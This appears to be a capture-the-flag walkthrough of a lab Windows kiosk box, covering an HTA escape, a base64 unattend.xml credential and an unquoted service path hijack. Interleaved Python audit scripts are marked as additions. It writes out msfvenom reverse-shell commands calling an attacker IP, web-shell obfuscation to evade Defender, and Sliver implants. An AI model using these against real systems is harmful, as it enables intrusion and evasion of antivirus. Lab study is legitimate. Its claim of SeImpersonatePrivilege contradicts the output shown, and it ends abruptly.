Overview

The machine starts by connecting to an RDP endpoint that drops into a locked HTA kiosk, escaping via the print dialog to get a shell as vdiuser, then credential hunting uncovers base64-encoded credentials in unattend.xml to pivot to svcuser. From svcuser, an unquoted service path in the Darkhaven Kiosk Monitor service running as dh_admin is exploited by dropping a Sliver service implant to get a session as dh_admin. From there, SeImpersonatePrivilege is abused via SigmaPotato through execute-assembly to add a local admin, then an alternate path abuses a scheduled task DLL plugin load to execute as Administrator and complete the box.

Enumeration

Start with an nmap scan.

We got only 4 open TCP ports:

  1. HTTP on 80 running IIS
  2. SMB on 445
  3. RDP on 3389 leaking some info
    • the NetBIOS name is EC2AMAZ-0536LUM
  4. HTTPS on 843 with the title "remote access portal", leaking the domain name darkhaven-vdi.corp

So add an entry to the hosts file and let's take a look at the remote access portal:

```bash
┌─[]─[10.200.65.74]─[jimmex@attacker]─[~/hacksmarter/kiosk]
└──╼ [★]$ echo '10.1.58.220 EC2AMAZ-0536LUM EC2AMAZ-0536LUM.darkhaven-vdi.corp darkhaven-vdi.corp' | sudo tee -a /etc/hosts
10.1.58.220 EC2AMAZ-0536LUM EC2AMAZ-0536LUM.darkhaven-vdi.corp darkhaven-vdi.corp
```

We're given two notes from the author:

DarkHaven has provided you with low-privileged credentials for the VDI portal. Username: vdiuser Password: VDI@DH2024!

If you get a "Script Error" message after connecting to the VDI, you can ignore it. It does not affect the lab in any way. This is what Ryan (author) said, "VDIs are usually broken, at least that is what we usually see and it is a pain to do stuff -- the error is intended."

Port 80 is the default IIS page, so we might come back to it if we hit a dead end, but for now let's focus on the HTTPS port.

DarkHaven Portal

As you can see it is a portal for the VDI, so let's log in.

After logging in we get this page.

At first I thought it would be something like Citrix, where we get the RDP session within the browser itself, but in this case it is just a page to view stats (that's what we know so far), and clicking Connect RDP just gives us the command for the connection, with /sec:rdp meaning it'll use standard RDP security rather than NLA (Network Level Authentication).

RDP as vdiuser

My version of xfreerdp3 is fairly recent, with a different syntax where you have to give /sec:rdp a value (on or off), and the same for /cert (ignore or deny, among other options), but once we do that we get a session back:

```bash
┌─[]─[10.200.65.74]─[jimmex@attacker]─[~/hacksmarter/kiosk]
└──╼ [★]$  xfreerdp3 /v:10.1.58.220 /u:vdiuser /p:'VDI@DH2024!' /sec:rdp:on /cert:ignore
[07:58:18:552] [5097:000013ea] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: : keycode: 0x08 -> no RDP scancode found
[07:58:18:552] [5097:000013ea] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: : keycode: 0x5D -> no RDP scancode found
[07:58:18:552] [5097:000013ea] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: MDSW: keycode: 0xCB -> no RDP scancode found
[07:58:37:209] [5097:000013ea] [ERROR][com.winpr.sspi.Kerberos] - [kerberos_AcquireCredentialsHandleA]: krb5glue_get_init_creds (Cannot contact any KDC for realm 'FREELANCER.HTB' [-1765328228])
[07:58:55:233] [5097:000013ea] [ERROR][com.winpr.sspi.Kerberos] - [kerberos_AcquireCredentialsHandleA]: krb5glue_get_init_creds (Cannot contact any KDC for realm 'FREELANCER.HTB' [-1765328228])
[07:58:55:710] [5097:000013ea] [WARN][com.freerdp.core.gcc] - [gcc_read_server_security_data]: Server uses non-advertised encryption method 0x00000000
[07:58:57:065] [5097:000013ea] [WARN][com.freerdp.core.connection] - [rdp_client_connect_auto_detect]: expected messageChannelId=1008, got 1003
[07:58:57:065] [5097:000013ea] [WARN][com.freerdp.core.license] - [license_read_binary_blob_data]: license binary blob::type BB_ERROR_BLOB, length=0, skipping.
[07:59:00:556] [5097:000013ea] [WARN][com.freerdp.core.connection] - [rdp_client_connect_auto_detect]: expected messageChannelId=1008, got 1003
[07:59:00:594] [5097:000013ea] [INFO][com.freerdp.gdi] - [gdi_init_ex]: Local framebuffer format PIXEL_FORMAT_BGRX32
[07:59:00:594] [5097:000013ea] [INFO][com.freerdp.gdi] - [gdi_init_ex]: Remote framebuffer format PIXEL_FORMAT_BGRA32
[07:59:00:654] [5097:000013ea] [INFO][com.freerdp.channels.rdpsnd.client] - [rdpsnd_load_device_plugin]: [static] Loaded fake backend for rdpsnd
[07:59:00:655] [5097:000013ea] [INFO][com.freerdp.channels.drdynvc.client] - [dvcman_load_addin]: Loading Dynamic Virtual Channel ainput
[07:59:00:656] [5097:000013ea] [INFO][com.freerdp.channels.drdynvc.client] - [dvcman_load_addin]: Loading Dynamic Virtual Channel rdpgfx
[07:59:00:656] [5097:000013ea] [INFO][com.freerdp.channels.drdynvc.client] - [dvcman_load_addin]: Loading Dynamic Virtual Channel disp
[07:59:00:657] [5097:000013ea] [INFO][com.freerdp.channels.drdynvc.client] - [dvcman_load_addin]: Loading Dynamic Virtual Channel rdpsnd
[07:59:03:288] [5097:000013f9] [INFO][com.freerdp.channels.rdpsnd.client] - [rdpsnd_load_device_plugin]: [dynamic] Loaded fake backend for rdpsnd
[07:59:04:947] [5097:000013ea] [INFO][com.freerdp.client.x11] - [xf_logon_error_info]: Logon Error Info LOGON_FAILED_OTHER [LOGON_MSG_SESSION_CONTINUE]
[07:59:06:789] [5097:000013f9] [WARN][com.freerdp.channels.drdynvc.client] - [check_open_close_receive]: {Microsoft::Windows::RDS::DisplayControl:10} OnOpen=(nil), OnClose=0x7f06a770c220
```

After the login we get the script error the author mentioned, but it won't affect the lab, so let's just move on.

Source-code Review

Clicking around the apps, nothing works until I right-click and choose View Source, which opens the app's source code in Notepad.

All the apps are actually just fake icons that don't execute any binaries.

Because there is an issue with resizing and we can't really read the source code, I copied it over to my attacker box (you have to enable /clipboard with xfreerdp3 for this to work).

As you can see the documents' content is stored in the source code itself; at first I thought it might be opening actual files from disk, but it doesn't.

Looking at the top of the source code we find that this is an HTA (HTML Application) with VBScript, not an actual Windows desktop:

```html
<html>
<head>
<title>Darkhaven Workspace</title>
<HTA:APPLICATION
    ID="DarkhavenVDI"
    APPLICATIONNAME="Darkhaven Workspace"
    SCROLL="auto"
    SINGLEINSTANCE="yes"
    WINDOWSTATE="maximize"
    SHOWINTASKBAR="no"
    SYSMENU="no"
    CAPTION="no"
    BORDER="none"
/>
<script language="VBScript">
Sub Window_OnLoad
    window.resizeTo screen.availWidth, screen.availHeight
    window.moveTo 0, 0
    jsInit()
End Sub
</script>
<style>
```

This part of the source code mentions secure shell execution, but using external files only.

And there is a lot of validation around this:

  1. you can't use any loopback address
  2. you can't use local drive paths like C:\ for example
  3. a lot of executables are blocked, like cmd and powershell and .exe files and so on
  4. the file:// protocol is blocked as well
  5. relative paths and dangerous characters are rejected

So what is allowed:

  1. UNC paths to external servers only, like \\server\share\file
  2. external HTTP URLs

Then at the end there is this OpenNetworkDocument() function, which is used with UNC paths to open the document.

These are the blocked executables and extensions:

```vbscript
InStr(pathLower, "cmd") > 0 Or _
             InStr(pathLower, "powershell") > 0 Or _
             InStr(pathLower, "mshta") > 0 Or _
             InStr(pathLower, "wscript") > 0 Or _
             InStr(pathLower, "cscript") > 0 Or _
             InStr(pathLower, ".exe") > 0 Or _
             InStr(pathLower, ".bat") > 0 Or _
             InStr(pathLower, ".com") > 0 Or _
             InStr(pathLower, ".scr") > 0 Or _
             InStr(pathLower, ".pif") > 0 Then
```
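To see what that blocklist actually does and doesn't do, here is a Python model of it, added here and not code from the kiosk or the writeup. It only models the substring part of the VBScript (not the loopback, drive-letter or file:// checks), and the extension allowlist beside it is an assumed hardened replacement, since the writeup doesn't say which document types the kiosk is meant to open.

```python
import os

# Substrings the kiosk's VBScript rejects anywhere in the lower-cased path.
BLOCKED_SUBSTRINGS = (
    "cmd", "powershell", "mshta", "wscript", "cscript",
    ".exe", ".bat", ".com", ".scr", ".pif",
)

# Assumed set of document types the kiosk should open; the writeup does not
# list them, so this stands in for a real deployment's policy.
ALLOWED_EXTENSIONS = {".txt", ".pdf", ".docx"}


def hta_blocklist_rejects(path: str) -> bool:
    """True when the kiosk's InStr blocklist would reject the path.

    Mirrors `InStr(pathLower, "...") > 0 Or ...`: a case-insensitive substring
    match over the whole string, with no idea what the path points at.
    """
    path_lower = path.lower()
    return any(token in path_lower for token in BLOCKED_SUBSTRINGS)


def hardened_allows(path: str) -> bool:
    """Allowlist alternative: only a UNC or HTTP(S) location whose last
    component carries an approved document extension is accepted."""
    is_unc = path.startswith("\\\\")
    is_http = path.lower().startswith(("http://", "https://"))
    if not (is_unc or is_http):
        return False
    # last path component, with any URL query string dropped
    last = path.replace("/", "\\").rsplit("\\", 1)[-1].split("?", 1)[0]
    return os.path.splitext(last)[1].lower() in ALLOWED_EXTENSIONS


def audit(paths):
    """Run both checks over a list of inputs.

    Returns {path: (blocklist_rejects, hardened_allows)} so the two policies
    can be compared side by side.
    """
    return {p: (hta_blocklist_rejects(p), hardened_allows(p)) for p in paths}


if __name__ == "__main__":
    samples = [
        r"\\server\share\payload.hta",         # the writeup's observation: no blocked substring
        r"\\server\share\report.txt",          # a legitimate document
        "http://docs.example.com/policy.txt",  # legitimate, but ".com" trips the blocklist
        r"C:\Windows\System32\cmd.exe",        # what the blocklist was written for
    ]
    for path, (rejected, allowed) in audit(samples).items():
        print(f"{path:40} blocklist_rejects={rejected!s:5} hardened_allows={allowed}")
```

Note that the substring match cuts both ways: .hta passes because it is not listed, while any URL on a .com domain is rejected because ".com" is.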

Rabbit Hole 1

The good thing is that it only filters on the file name, not the actual content, so we can host a payload on SMB and use the UNC path to execute it; we could call it something like payload.hta, and the .hta extension isn't blocked anyway.

Here is the part related to OpenNetworkDocument. We can't resize the window since resizing isn't working, but remember we have Notepad running, so we can use the open dialog trick.

First create the payload:

```bash
┌─[]─[10.200.65.74]─[jimmex@attacker]─[~/hacksmarter/kiosk]
└──╼ [★]$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.200.65.74 LPORT=4444 -f hta-psh -o payload.hta
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of hta-psh file: 7823 bytes
Saved as: payload.hta
```

Then start your SMB server:

```bash
┌─[]─[10.200.65.74]─[jimmex@attacker]─[~/hacksmarter/kiosk]
└──╼ [★]$ sudo smbserver.py -smb2support share .
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies
```

Tried this but it didn't work out because it can't find the path.

The scrolling and resizing don't work, but we can find our way around that using the Tab key, which moves between fields in most browsers; once you press Tab you'll see that it scrolled down a bit to this input field.

But same issue: it returns an error that anonymous SMB connections aren't allowed on this network.

Flag 1

Back to the open dialog: at least we can use it to enumerate what's on the system. There are a lot of folders in C:\ related to Darkhaven and the VDI, one of them being C:\VDIData, where I found the first flag.

As you can see, after clicking Open on it, it opened in Notepad.

Using the open dialog technique we got cmd opened. Now we can ignore the anonymous SMB share error, because we can mount our own share with a username and password if we really need to.

Rabbit Hole 2

Looking around, I knew we could abuse one of those HTTP or HTTPS ports if we had write access to one of their directories, and maybe they run as another user, so I figured let's check those apps. For HTTP on port 80 I guessed it was running from wwwroot, but it was empty and we don't have write access anyway; the portal on 8443, though, we have access to, and we can actually write to it as BUILTIN\Users, so let's use SMB to upload an ASPX shell:

```plaintext
PS C:\DarkhavenPortal> cat .\web.config
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
    <system.webServer>
        <defaultDocument>
            <files>
                <remove value="Default.htm" />
                <remove value="Default.asp" />
                <remove value="index.htm" />
                <remove value="index.html" />
                <remove value="iisstart.htm" />
                <add value="default.asp" />
            </files>
        </defaultDocument>
    </system.webServer>
</configuration>
PS C:\DarkhavenPortal> icacls .
. NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
  BUILTIN\Administrators:(I)(OI)(CI)(F)
  BUILTIN\Users:(I)(OI)(CI)(RX)
  BUILTIN\Users:(I)(CI)(AD)
  BUILTIN\Users:(I)(CI)(WD)
  CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files
```

I used the ASPX shell from Laudanum and then re-served SMB, but this time with a username and password:

```bash
┌─[]─[10.200.65.74]─[jimmex@attacker]─[~/hacksmarter/kiosk]
└──╼ [★]$ sudo smbserver.py -smb2support share . -username jimmy -password jimmy
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies
```

System error 53 on the first attempt (the share was requested from 10.200.65.75 instead of 10.200.65.74):

```plaintext
PS C:\DarkhavenPortal> net use \\10.200.65.75\share /user:jimmy jimmy
System error 53 has occurred.

The network path was not found.
```

With the right address we mounted the share, so now let's get the shell over:

```plaintext
Control-C
PS C:\DarkhavenPortal> net use \\10.200.65.74\share /user:jimmy jimmy
The command completed successfully.
```

The Laudanum shell was caught as a bad file by Defender:

```plaintext
PS C:\DarkhavenPortal> move \\10.200.65.74\share\shell.asp ./shell.asp
move : Operation did not complete successfully because the file contains a virus or potentially unwanted software.
At line:1 char:1
+ move \\10.200.65.74\share\shell.asp ./shell.asp
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : WriteError: (\\10.200.65.74\share\shell.asp:FileInfo) [Move-Item], IOException
    + FullyQualifiedErrorId : MoveFileInfoItemIOError,Microsoft.PowerShell.Commands.MoveItemCommand
```

So I did some obfuscation of the shell source code (deleting comments), removing any "shell" keywords and replacing them with words like rip instead of remoteIp, and it worked. Now let's hit it from the web app:

```powershell
PS C:\DarkhavenPortal> wget http://10.200.65.74/s.asp -O s.asp
PS C:\DarkhavenPortal> ls


    Directory: C:\DarkhavenPortal


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/7/2026 9:40 PM 40 default.asp
-a---- 6/2/2026 2:55 PM 4292 login.asp
-a---- 5/29/2026 2:30 PM 7207 portal.asp
-a---- 3/7/2026 9:40 PM 69 robots.txt
-a---- 6/17/2026 4:12 PM 1771 s.asp
-a---- 3/7/2026 9:40 PM 505 web.config
```

I found that the app is running as DefaultAppPool, which is a low-privileged account, but there are some interesting things about this user that we can mention later, one being that it has SeImpersonatePrivilege. Now let's try to get a shell.

It didn't work out. I hoped it might, but it didn't, so our only option now is to go back to cmd and look for interesting files.

Credential Hunting

One of the things you should always look for is unattend files. Scripts like PowerUp and winPEAS do that for us, but we can't use them because of Defender, so doing it manually turned up the Panther one. Let's take a look at it:

```powershell
PS C:\> cmd /c "dir C:\ /s /b 2>nul | findstr /i unattend"
C:\ProgramData\Amazon\EC2-Windows\Launch\Sysprep\Unattend.xml
C:\Users\All Users\Amazon\EC2-Windows\Launch\Sysprep\Unattend.xml
C:\Windows\Panther\unattend.xml
C:\Windows\Panther\UnattendGC
C:\Windows\Panther\UnattendGC\diagerr.xml
C:\Windows\Panther\UnattendGC\diagwrn.xml
C:\Windows\Panther\UnattendGC\setupact.log
C:\Windows\Panther\UnattendGC\setuperr.log
```

And here is the file content, leaking the password for the user svcuser.

RDP as svcuser

We got the base64-encoded password, so let's decode it and check it out:

```bash
┌─[]─[10.200.65.74]─[jimmex@attacker]─[~/hacksmarter/kiosk]
└──╼ [★]$ echo 'UwB2AGMAXwBEAEgAIQAyADAAMgA0AA==' | base64 -d
Svc_DH!2024┌─[]─[10.200.65.74]─[jimmex@attacker]─[~/hacksmarter/kiosk]
└──╼ [★]$
```
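The decode above only prints cleanly because the terminal swallows the NUL bytes: the value is UTF-16LE, which is how Windows Setup stores AutoLogon passwords in unattend files. As an added example that is not part of the writeup, here is a small audit script that finds and decodes such credentials in an unattend.xml so they can be purged; the XML around the writeup's base64 value is constructed, since the real file was only shown as a screenshot.

```python
import base64
import xml.etree.ElementTree as ET

NS = "{urn:schemas-microsoft-com:unattend}"

# Constructed sample: the AutoLogon layout Windows Setup uses, carrying the
# base64 value from the writeup's C:\Windows\Panther\unattend.xml. The real
# file was only shown as a screenshot, so everything except that value is assumed.
SAMPLE_UNATTEND = """\
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password>
          <Value>UwB2AGMAXwBEAEgAIQAyADAAMgA0AA==</Value>
          <PlainText>false</PlainText>
        </Password>
        <Enabled>true</Enabled>
        <Username>svcuser</Username>
      </AutoLogon>
    </component>
  </settings>
</unattend>
"""


def decode_unattend_password(value: str, plain_text: bool) -> str:
    """Decode a <Password><Value> as Setup stores it: UTF-16LE, base64 when
    PlainText is false, usually with the literal word "Password" appended
    (the value on this box has no suffix, so the strip is conditional)."""
    if plain_text:
        return value
    text = base64.b64decode(value).decode("utf-16-le")
    return text[:-len("Password")] if text.endswith("Password") else text


def encode_unattend_password(password: str) -> str:
    """Inverse of the above, in the suffixed form Setup normally writes."""
    return base64.b64encode((password + "Password").encode("utf-16-le")).decode("ascii")


def find_unattend_credentials(xml_text: str) -> list[dict]:
    """Return every account/password pair embedded in an unattend file
    (AutoLogon and UserAccounts/LocalAccount entries)."""
    root = ET.fromstring(xml_text)
    findings = []
    holders = list(root.iter(NS + "AutoLogon")) + list(root.iter(NS + "LocalAccount"))
    for holder in holders:
        pw = holder.find(NS + "Password")
        if pw is None:
            continue
        value = (pw.findtext(NS + "Value") or "").strip()
        if not value:
            continue
        # PlainText is taken as true when the element is absent (assumed default).
        plain = (pw.findtext(NS + "PlainText") or "true").strip().lower() == "true"
        user = holder.findtext(NS + "Username") or holder.findtext(NS + "Name") or "?"
        findings.append({
            "user": user.strip(),
            "password": decode_unattend_password(value, plain),
            "stored_as": "plaintext" if plain else "base64 utf-16le",
        })
    return findings


if __name__ == "__main__":
    for finding in find_unattend_credentials(SAMPLE_UNATTEND):
        print(finding)
```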

And as you can see it is valid for RDP, so let's connect:

```bash
┌─[]─[10.200.65.74]─[jimmex@attacker]─[~/hacksmarter/kiosk]
└──╼ [★]$ nxc rdp darkhaven-vdi.corp -u svcuser -p 'Svc_DH!2024'
RDP 10.1.58.220 3389 EC2AMAZ-0536LUM [*] Windows 10 or Windows Server 2016 Build 17763 (name:EC2AMAZ-0536LUM) (domain:EC2AMAZ-0536LUM) (nla:True)
RDP 10.1.58.220 3389 EC2AMAZ-0536LUM [+] EC2AMAZ-0536LUM\svcuser:Svc_DH!2024 (Pwn3d!)
┌─[]─[10.200.65.74]─[jimmex@attacker]─[~/hacksmarter/kiosk]
└──╼ [★]$
```

Let's log in again with this user:

```bash
┌─[]─[10.200.65.74]─[jimmex@attacker]─[~/hacksmarter/kiosk]
└──╼ [★]$ xfreerdp3 /v:10.1.58.220 /u:svcuser /p:'Svc_DH!2024' /cert:ignore /dynamic-resolution /clipboard /auth-pkg-list:ntlm
[10:06:13:093] [9757:0000261e] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: : keycode: 0x08 -> no RDP scancode found
[10:06:13:094] [9757:0000261e] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: : keycode: 0x5D -> no RDP scancode found
[10:06:13:094] [9757:0000261e] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: MDSW: keycode: 0xCB -> no RDP scancode found
[10:06:31:733] [9757:0000261e] [ERROR][com.winpr.sspi.Kerberos] - [kerberos_AcquireCredentialsHandleA]: krb5glue_get_init_creds (Cannot contact any KDC for realm 'FREELANCER.HTB' [-1765328228])
[10:06:49:749] [9757:0000261e] [ERROR][com.winpr.sspi.Kerberos] - [kerberos_AcquireCredentialsHandleA]: krb5glue_get_init_creds (Cannot contact any KDC for realm 'FREELANCER.HTB' [-1765328228])
[10:06:51:476] [9757:0000261e] [WARN][com.freerdp.core.connection] - [rdp_client_connect_auto_detect]: expected messageChannelId=1008, got 1003
[10:06:51:477] [9757:0000261e] [WARN][com.freerdp.core.license] - [license_read_binary_blob_data]: license binary blob::type BB_ERROR_BLOB, length=0, skipping.
[10:06:51:538] [9757:0000261e] [WARN][com.freerdp.core.connection] - [rdp_client_connect_auto_detect]: expected messageChannelId=1008, got 1003
[10:06:51:587] [9757:0000261e] [INFO][com.freerdp.gdi] - [gdi_init_ex]: Local framebuffer format PIXEL_FORMAT_BGRX32
[10:06:51:587] [9757:0000261e] [INFO][com.freerdp.gdi] - [gdi_init_ex]: Remote framebuffer format PIXEL_FORMAT_BGRA32
[10:06:51:643] [9757:0000261e] [INFO][com.freerdp.channels.rdpsnd.client] - [rdpsnd_load_device_plugin]: [static] Loaded fake backend for rdpsnd
[10:06:51:646] [9757:0000261e] [INFO][com.freerdp.channels.drdynvc.client] - [dvcman_load_addin]: Loading Dynamic Virtual Channel ainput
[10:06:51:646] [9757:0000261e] [INFO][com.freerdp.channels.drdynvc.client] - [dvcman_load_addin]: Loading Dynamic Virtual Channel rdpgfx
[10:06:51:646] [9757:0000261e] [INFO][com.freerdp.channels.drdynvc.client] - [dvcman_load_addin]: Loading Dynamic Virtual Channel disp
[10:06:51:646] [9757:0000261e] [INFO][com.freerdp.channels.drdynvc.client] - [dvcman_load_addin]: Loading Dynamic Virtual Channel rdpsnd
[10:06:52:153] [9757:00002636] [INFO][com.freerdp.channels.rdpsnd.client] - [rdpsnd_load_device_plugin]: [dynamic] Loaded fake backend for rdpsnd
[10:06:52:384] [9757:0000261e] [INFO][com.freerdp.client.x11] - [xf_logon_error_info]: Logon Error Info LOGON_WARNING [LOGON_MSG_SESSION_CONTINUE]
[10:06:53:266] [9757:00002636] [WARN][com.freerdp.channels.drdynvc.client] - [check_open_close_receive]: {Microsoft::Windows::RDS::DisplayControl:10} OnOpen=(nil), OnClose=0x7f6c650e0220
```

We drop into another container, and I bet we can use the same technique we used before to get a shell, so let's get a PowerShell.

Got a PowerShell as svcuser, and we got the second flag.

Looking at the Program Files directory, I found this Services directory that I didn't notice the first time, which is also related to Darkhaven:

```powershell
PS C:\Program Files> ls


    Directory: C:\Program Files


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/11/2023 3:08 AM Amazon
d----- 9/15/2018 7:28 AM Common Files
d----- 3/8/2026 1:37 PM Darkhaven Kiosk Services
d----- 6/1/2026 8:18 PM internet explorer
d-r--- 1/13/2021 9:21 PM Windows Defender
d----- 6/1/2026 8:18 PM Windows Defender Advanced Threat Protection
d----- 7/14/2021 4:03 AM Windows Mail
d----- 6/1/2026 8:18 PM Windows Media Player
d----- 6/1/2026 8:18 PM Windows Multimedia Platform
d----- 9/15/2018 7:28 AM windows nt
d----- 1/13/2021 9:21 PM Windows Photo Viewer
d----- 6/1/2026 8:18 PM Windows Portable Devices
d----- 9/15/2018 7:19 AM Windows Security
d----- 9/15/2018 7:19 AM WindowsPowerShell
```

Listing permissions on this directory, we have full access to it as svcuser, which kind of makes sense given the username and the directory name.

Listing the running services, I found the service name:

```powershell
PS C:\Program Files\Darkhaven Kiosk Services\DH Monitor Service> Get-WmiObject Win32_Service | Where-Object {$_.Name -like "*kiosk*" -or $_.Name -like "*darkhaven*" }


ExitCode : 0
Name : DH_KioskMonitor
ProcessId : 2808
StartMode : Unknown
State : Running
Status : UNKNOWN
```

Let's take a closer look at it:

```powershell
PS C:\Program Files\Darkhaven Kiosk Services> sc.exe qc DH_KioskMonitor
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: DH_KioskMonitor
        TYPE : 10 WIN32_OWN_PROCESS
        START_TYPE : 2 AUTO_START
        ERROR_CONTROL : 1 NORMAL
        BINARY_PATH_NAME : C:\Program Files\Darkhaven Kiosk Services\DH Monitor Service\monitor.exe
        LOAD_ORDER_GROUP :
        TAG : 0
        DISPLAY_NAME : Darkhaven Kiosk Monitor
        DEPENDENCIES :
        SERVICE_START_NAME : .\dh_admin
```

So there is an issue here: the binary path isn't quoted, so we can hijack that binary (kind of). The unquoted service path hijack works because of how Windows resolves paths with spaces when they aren't quoted, so for this path:

```plaintext
C:\Program Files\Darkhaven Kiosk Services\DH Monitor Service\monitor.exe
```

Windows tries each space as a potential path break, in order:

  1. C:\Program.exe
  2. C:\Program Files\Darkhaven.exe
  3. C:\Program Files\Darkhaven Kiosk.exe
  4. C:\Program Files\Darkhaven Kiosk Services\DH.exe ← hijack point (any point you can write to before the actual binary works; in some cases you could even overwrite the binary itself, but I don't want to mess it up in case we need it later)
  5. Real binary
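The resolution order above, as an added example that is not from the writeup: it implements the general rule of which the list shows one instance (every space is a split point and .exe is appended to each prefix that has no extension), so it also yields C:\Program Files\Darkhaven Kiosk Services\DH Monitor.exe, which the list skips. writable_dirs is supplied by the caller, for example from icacls output; the script does not inspect ACLs itself.

```python
import ntpath


def unquoted_path_candidates(binary_path_name: str) -> list[str]:
    """Return the image paths Windows may try, in order, for a service's
    BINARY_PATH_NAME. A quoted path resolves as written; an unquoted one with
    spaces is tried at every space, .exe appended to each prefix that has no
    extension, with the full string last."""
    if binary_path_name.startswith('"'):
        return [binary_path_name.split('"')[1]]
    tokens = binary_path_name.split(" ")
    candidates = []
    for i in range(1, len(tokens)):
        prefix = " ".join(tokens[:i])
        candidates.append(prefix if ntpath.splitext(prefix)[1] else prefix + ".exe")
    candidates.append(binary_path_name)
    return candidates


def is_unquoted_with_spaces(binary_path_name: str) -> bool:
    """The audit condition tools like PowerUp and winPEAS report on."""
    return not binary_path_name.startswith('"') and " " in binary_path_name


def hijack_points(binary_path_name: str, writable_dirs) -> list[str]:
    """Candidates (real binary excluded) whose directory is in writable_dirs.

    Writability is an input here, e.g. taken from icacls output, so the check
    runs offline; on the box itself you would test the ACL of each directory.
    """
    writable = {d.lower().rstrip("\\") for d in writable_dirs}
    return [c for c in unquoted_path_candidates(binary_path_name)[:-1]
            if ntpath.dirname(c).lower().rstrip("\\") in writable]


def quoted(image_path: str) -> str:
    """The fix: wrap the image path (without arguments) in quotes so there is
    exactly one candidate."""
    return image_path if image_path.startswith('"') else f'"{image_path}"'


if __name__ == "__main__":
    # The service from the writeup (sc.exe qc DH_KioskMonitor).
    svc = r"C:\Program Files\Darkhaven Kiosk Services\DH Monitor Service\monitor.exe"
    for n, c in enumerate(unquoted_path_candidates(svc), 1):
        print(n, c)
    # svcuser had full control of this directory per the writeup.
    print("hijack points:", hijack_points(svc, [r"C:\Program Files\Darkhaven Kiosk Services"]))
    print("fixed:", quoted(svc), "->", unquoted_path_candidates(quoted(svc)))
```

The remediation is to quote the path in the service configuration, e.g. `sc.exe config DH_KioskMonitor binPath= "\"C:\Program Files\Darkhaven Kiosk Services\DH Monitor Service\monitor.exe\""`, after which only the real binary is a candidate.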

Trying to find out whether we can start and stop it, we got access denied:

```plaintext
PS C:\Program Files\Darkhaven Kiosk Services\DH Monitor Service> sc.exe sdshow DH_KioskMonitor
[SC] OpenService FAILED 5:

Access is denied.
```

Trying to restart it blindly worked, so we can now hijack that binary.

Dumb move

Generate our payload:

```bash
┌─[]─[10.200.65.74]─[jimmex@attacker]─[~/hacksmarter/kiosk]
└──╼ [★]$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.200.65.74 LPORT=4444 -f exe -o monitor.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: monitor.exe
```

Same issue with Defender, so let's try to find a way around it, and if that doesn't work I'll have to use Sliver.

So it was a dumb move, because Defender deleted the service itself instead, and I had to reset the machine:

```plaintext
PS C:\Program Files\Darkhaven Kiosk Services\DH Monitor Service> sc.exe query DH_KioskMonitor
[SC] EnumQueryServicesStatus:OpenService FAILED 1060:

The specified service does not exist as an installed service.
```

I should've used Sliver from the start since I saw that Windows Defender is running, or at least written a simple C# app to do this and compiled it on the target.

Using Sliver

Generate a listener and implant.

Shell as dh_admin

Now when it starts again, Windows begins resolving from the root C:\ all the way up to monitor.exe, but because there are no quotes it checks for DH.exe where there is a space, and that's where our executable is: C:\Program Files\Darkhaven Kiosk Services\DH.exe

```plaintext
SERVICE_NAME: DH_KioskMonitor
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
PS C:\Program Files\Darkhaven Kiosk Services> sc.exe start DH_KioskMonitor

SERVICE_NAME: DH_KioskMonitor
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 3732
        FLAGS              :
PS C:\Program Files\Darkhaven Kiosk Services>
```

And we got a hit back:

```bash
[127.0.0.1] sliver > jobs

 ID Name Protocol Port Domains
==== ====== ========== ====== =========
 2    mtls   tcp        4444


[*] Session d647ace4 ELDERLY_SUMMER - 10.1.23.51:50018 (EC2AMAZ-0536LUM) - windows/amd64 - Wed, 17 Jun 2026 12:07:12 PDT
```

And the shell is as dh_admin, so let's find the third flag:

```plaintext
[127.0.0.1] sliver > use d647ace4

[*] Active session ELDERLY_SUMMER (d647ace4-729f-460f-b610-c37f0660e863)

[127.0.0.1] sliver (ELDERLY_SUMMER) > whoami

Logon ID: EC2AMAZ-0536LUM\dh_admin
[*] Current Token ID: EC2AMAZ-0536LUM\dh_admin
```

And we got the third flag.

SeImpersonate on dh_admin

Looking at the privileges, this user has SeImpersonatePrivilege, so let's use it on the box:

```plaintext
PS C:\Users\dh_admin\Desktop> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
